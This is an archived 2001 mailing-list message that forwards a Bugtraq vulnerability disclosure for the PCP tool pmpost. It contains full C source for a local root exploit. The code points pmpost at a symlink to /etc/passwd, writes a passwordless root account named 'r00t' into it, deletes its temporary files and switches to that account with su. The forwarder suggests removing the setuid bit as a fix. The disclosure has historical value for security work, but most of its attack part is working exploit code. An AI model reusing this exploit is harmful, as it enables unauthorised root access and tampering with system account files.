pcp
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

PCP exploit: pmpost - another nice symlink follower

from [Michal Kara] [Permanent Link][Original]
To: pcp@xxxxxxxxxxx
Subject: PCP exploit: pmpost - another nice symlink follower
From: Michal Kara <lemming@xxxxxxxxxxxxxxxxxxx>
Date: Tue, 19 Jun 2001 08:17:03 +0200
Sender: owner-pcp@xxxxxxxxxxx 
  I guess this is of a high importance for people on this list... If you don't
need pmpost suided, just remove the suid bit and it'll be fine.

                                                        Michal


----- Forwarded message from Paul Starzetz <paul@xxxxxxxxxxx> -----

Return-Path: <bugtraq-return-483-lemming=arthur.plbohnice.cz@xxxxxxxxxxxxxxxxx>
Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
Date: Mon, 18 Jun 2001 19:11:20 +0200
From: Paul Starzetz <paul@xxxxxxxxxxx>
X-Accept-Language: en
To: "bugtraq@xxxxxxxxxxxxxxxxx" <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: pmpost - another nice symlink follower

Hi,

there is a symlink handling problem in the pcp suite from SGI. The
binary pmpost will follow symlinks, if setuid root this leads to instant
root compromise, as found on SuSE 7.1 (I doubt that this a default SuSE
package, though).

Attached a simple C source to demonstrate this (gcc pm.c -o pm  then
./pm)



Ihq.



---------------------- pm.c ----------------------------

/********************************************************
*                                                       *
*               pmpost local root exploit               *
*               vulnerable: pcp <= 2.1.11-5             *
*               by IhaQueR                              *
*                                                       *
********************************************************/




#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/stat.h>



main()
{
const char *bin="/usr/share/pcp/bin/pmpost";
static char buf[512];
static char dir[128];


        srand(time(NULL));
        sprintf(dir, "/tmp/dupa.%.8d", rand());

        if(mkdir(dir, S_IRWXU))
                _exit(2);

        if(chdir(dir))
                _exit(3);

        if(symlink("/etc/passwd", "./NOTICES"))
                _exit(4);

        snprintf(buf, sizeof(buf)-1, "PCP_LOG_DIR=%.500s", dir);

        if(putenv(buf))
                _exit(5);

        if(!fork()) {
                execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL);
                _exit(1);
        }
        else {
                waitpid(0, NULL, WUNTRACED);
                chdir("..");
                sprintf(buf, "rm -rf dupa.*");
                system(buf);
                execl("/bin/su", "/bin/su", "r00t", NULL);
        }
}

----- End forwarded message -----
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  RE: porting PCP to Red Hat Alpha linux, gilly
Next by Date:  Re: PCP exploit: pmpost - another nice symlink follower, Jan-Frode Myklebust
Previous by Thread:  porting PCP to Red Hat Alpha linux, gilly
Next by Thread:  Re: PCP exploit: pmpost - another nice symlink follower, Jan-Frode Myklebust
Indexes:  [Date] [Thread] [Top] [All Lists]